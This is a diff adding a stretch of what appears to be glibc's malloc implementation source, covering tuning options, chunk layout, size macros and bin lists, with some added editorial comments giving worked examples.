+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
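+
+/*
+  Editorial note (not upstream text): unlike memalign, posix_memalign
+  reports failure through its return value (an errno-style code such
+  as EINVAL or ENOMEM), and the alignment must be a power of two
+  multiple of sizeof(void *), e.g.:
+
+  void *p;
+  int rc = posix_memalign(&p, 64, 1024);
+  if (rc == 0)
+    memset(p, 0, 1024);
+
+  Here 64 and 1024 are arbitrary example values.
+*/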
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
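+
+/*
+  Editorial note (not upstream text): worked example of the default.
+  On a typical 64-bit build SIZE_SZ is 8, so DEFAULT_MXFAST is
+  64 * 8 / 4 = 128 (a REQUEST size); set_max_fast below converts this
+  to a chunk-size limit of 0x80, so the default fastbins serve chunks
+  of 0x20 through 0x80 bytes.  On 32-bit builds the default is 64.
+*/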
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
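+
+/*
+  Editorial note (not upstream text): setting the threshold explicitly
+  through mallopt also turns off the sliding behaviour described above
+  (see the no_dyn_threshold field of struct malloc_par below), e.g.:
+
+  mallopt(M_MMAP_THRESHOLD, 1024 * 1024);
+
+  after which requests of at least a megabyte that cannot be served
+  from existing free space go to mmap, and the threshold no longer
+  adapts to the program's free pattern.
+*/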
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
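+
+/*
+  Editorial illustration (not upstream text): decoding a raw size field
+  read from a heap, using the A/M/P layout drawn above.  The constants
+  match PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA defined further down.
+
+  size_t raw       = 0x91;                 example: header of a 0x90 chunk
+  size_t size      = raw & ~(size_t) 0x7;  0x90, the real chunk size
+  int    prev_used = raw & 0x1;            P: previous chunk in use
+  int    mmapped   = raw & 0x2;            M: obtained via mmap
+  int    non_main  = raw & 0x4;            A: lives in a non-main arena
+*/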
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
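+
+/*
+  Editorial note (not upstream text): worked examples of request2size
+  on a typical x86-64 build, where SIZE_SZ is 8, MALLOC_ALIGN_MASK is
+  15 and MINSIZE is 32 (0x20):
+
+  request2size(0)   -> MINSIZE          = 0x20
+  request2size(24)  -> (24+8+15) & ~15  = 0x20
+  request2size(25)  -> (25+8+15) & ~15  = 0x30
+  request2size(120) -> (120+8+15) & ~15 = 0x80
+
+  i.e. each chunk carries one SIZE_SZ header word of overhead and is
+  rounded up to a multiple of 16 bytes.
+*/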
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
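+
+/*
+  Editorial note (not upstream text): stripped of its integrity checks
+  and large-bin bookkeeping, the core of unlink is the usual
+  doubly-linked-list removal:
+
+  FD = P->fd;
+  BK = P->bk;
+  FD->bk = BK;
+  BK->fd = FD;
+
+  The chunksize vs. prev_size comparison and the FD->bk != P ||
+  BK->fd != P test above exist precisely because these two writes
+  would otherwise dereference attacker-controlled fd/bk pointers when
+  chunk metadata has been corrupted.
+*/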
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
